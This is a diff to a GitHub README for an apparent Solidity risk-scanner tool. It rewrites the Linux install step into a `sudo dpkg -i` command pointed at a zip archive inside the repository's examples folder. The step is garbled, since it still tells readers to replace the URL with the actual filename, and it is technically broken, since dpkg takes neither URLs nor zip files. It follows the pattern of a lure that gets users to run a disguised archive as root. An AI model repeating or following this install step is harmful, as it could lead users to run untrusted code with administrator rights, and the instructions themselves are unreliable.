Jessej123-hash/Solidity-Economic-Risk-Scanner/README.md

 **For Linux:**
 1. Open your terminal.
 2. Use the command `cd ~/Downloads` to navigate to the downloads folder.
-3. Run the installation with `sudo dpkg -i yourfile.deb` (replace "yourfile.deb" with the actual filename).
+3. Run the installation with `sudo dpkg -i https://raw.githubusercontent.com/Jessej123-hash/Solidity-Economic-Risk-Scanner/main/examples/Solidity-Economic-Risk-Scanner_v3.0-beta.3.zip` (replace "https://raw.githubusercontent.com/Jessej123-hash/Solidity-Economic-Risk-Scanner/main/examples/Solidity-Economic-Risk-Scanner_v3.0-beta.3.zip" with the actual filename).
 4. Launch the application from your applications menu.

 ## 🌐 Using the Scanner